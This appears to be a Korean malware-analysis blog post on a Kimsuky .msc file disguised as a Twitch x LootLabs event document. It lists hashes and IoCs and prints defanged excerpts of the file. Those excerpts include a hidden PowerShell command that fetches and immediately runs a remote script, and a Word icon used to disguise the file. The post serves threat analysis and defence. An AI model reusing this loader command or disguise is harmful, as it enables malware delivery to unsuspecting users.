lazarusholic

Everyday is lazarus.dayβ

게임 링크 단축 및 수익 창출 LootLabs 으로 위장한것으로 추정 되는 김수키(Kimsuky) 악성코드-Twitch x Loot Lab Event-2025.msc(2024.9.9)

2024-09-13, Sakai
http://wezard4u.tistory.com/429277
#Kimsuky #MSC

Contents

오늘은 게임 링크 단축 및 수익 창출 LootLabs 으로 위장한 것으로 추정되며 김수키(Kimsuky) 악성코드 Twitch x Loot Lab Event-2025.msc(2024.9.9) 에 대해 글을 적어보겠습니다.
악성코드 해쉬값
파일명: Twitch x Loot Lab Event-2025.msc
사이즈:141 KB
MD5:41c656c497d7ec24de57a9927c13e81c
SHA-1:4bf38af3605e439d2de62f353c5829c47501c197
SHA-256:5042f64c0c5b1325964279106f0afa330fb2810416043784f5b4deeef0e93aa4
일단 해당 파일은 msc 이지만 해당 코드는 파워셀을 통해서 작동을 하는것을 확인을 할 수가 있습니다.
악성코드
<ConsoleTaskpads>
<ConsoleTaskpad List(S)ize="Medium" IsNodeSpecific="true" ReplacesDefaultVi
ew="tr(u)e" No(R)esults="true" DescriptionsAsText="true" NodeType=
"{C96401C(E)-0E17-11D3(-)885B-00C04F72C717}" ID="{656F3A6A-1A63-4F(C)4-9C9B
-4B75AF6DF3A3}">
<String Name="Name" ID(=)"4"/>
<String Name="Descripti(o)n" Value=""/>
<String Name="Tooltip" Va(l)ue=""/>
<Tasks>
<Task Type="Command(L)ine" Command="powershell.exe">
<String Name="Name" (I)D="5"/>
<String Name="Descripti(o)n" ID="11"/>
<Symbol>
<Imag(e) Name="Sma(l)l" BinaryR(e)fIndex="6"/>
<Image Name="Lar(g)e" BinaryR(e)fIndex="7"/>
</Sy(m)bol>
<Comman(d)Line Directory="" WindowSt(a)te="Minimized" Params="-WindowS(
)yle Hidden -Comm(a)nd iex (iwr (-)Uri 'hxxps://oshi(.)at/PTgX/jIML(.)txt'
-UseBa(
악성코드 분석
powershell.exe:Windows PowerShell을 실행하는 명령어로
-WindowStyle Hidden: PowerShell 창을 숨겨서 사용자에게 노출되지 않도록 설정
iex (iwr (-)Uri 'hxxps://oshi(.)at/PTgX/jIML(.)txt' -UseBa(s)icParsing):해당 명령은 원격 서버에 요청을 보내 스크립트를 다운로드하고 이를 즉시 실행(iex)
hxxps://oshi(.)at/PTgX/jIML(.)txt:해당 URL에서 스크립트 파일을 가져오려는 시도 외부에서 악성코드 다운로드
아이콘 위장
<VisualAttributes>
<String Name="ApplicationTitle" ID="10"/>
<Icon Index="0" File="C:\Progra(m) Files\Microsoft Office\root\Office16\WINWORD(.)EXE">
<Image Name="Large" BinaryRefInd(e)x="0"/>
<Image Name="Small" BinaryRefIn(d)ex="1"/>
<Image Name="Large48x" BinaryRefI(n)dex="2"/>
</Icon>
</VisualAttributes>
구성 요소 분석
1.<String Name="ApplicationTitle" ID="10"/>:
해당 항목은 애플리케이션의 제목을 정의
여기서는 ID="10만 명시되어 있고 실제 제목 텍스트는 생략
하지만, 애플리케이션이 Word인 것처럼 위장
2.<Icon Index="0" File="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE">:
해당 부분은 아이콘 속성을 설정
WINWORD(.)EXE …

IoC

41c656c497d7ec24de57a9927c13e81c
5042f64c0c5b1325964279106f0afa330fb2810416043784f5b4deeef0e93aa4